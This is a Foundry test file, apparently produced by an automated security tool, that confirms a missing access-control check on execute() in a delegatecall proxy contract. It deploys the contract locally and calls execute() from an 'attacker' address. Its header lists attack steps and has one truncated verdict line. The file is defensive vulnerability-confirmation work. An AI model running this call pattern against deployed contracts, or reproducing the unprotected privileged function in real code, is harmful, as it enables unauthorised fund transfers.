// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/console.sol";

/**
 * ╔═══════════════════════════════════════════════════════════════════╗
 * ║  AGL DYNAMIC PoC #9 — Auto-Generated Exploit Test           ║
 * ╚═══════════════════════════════════════════════════════════════════╝
 *
 * CONTRACT:      delegatecall_proxy
 * FUNCTION:      execute
 * VULNERABILITY: ACCESS CONTROL
 * SEVERITY:      medium
 * CONFIDENCE:    100.0%
 * VERDICT:       EXPLOITABLE: execute() — Z3 SAT with concrete values, invariant 'no_free_money' violated. Attack cos
 *
 * ATTACK STEPS:
 *   1. 1. Attacker calls execute() — no onlyOwner / access modifier
 *   2. 2. Function executes privileged logic (fund transfer / config change)
 *   3. 3. INVARIANT BROKEN: access_gated — unauthorized caller succeeded
 *
 * GENERATED BY:  AGL Security Tool — Dynamic PoC Generator
 * DATE:          2026-03-13 02:40
 */

import "../../delegatecall_proxy.sol";

contract PoC_AccessControl_delegatecall_proxy_Test is Test {
    delegatecall_proxy public target;

    function setUp() public {
        target = new delegatecall_proxy();
    }

    function test_access_control_bypass() public {
        console.log("=== AGL PoC: Access Control in delegatecall_proxy.execute ===");

        address attacker = makeAddr("attacker");

        // Try calling the unprotected function as a non-owner
        vm.prank(attacker);

        // Low-level call with correct signature
        (bool success, ) = address(target).call(
            abi.encodeWithSignature("execute(address)", attacker)
        );

        if (success) {
            console.log("[CONFIRMED] Access control missing on execute!");
            console.log("  Non-owner was able to call privileged function");
        } else {
            console.log("[SAFE] Function correctly reverted for non-owner");
        }

        assertTrue(success, "Access control bypass: non-owner should succeed on unprotected function");
    }
}
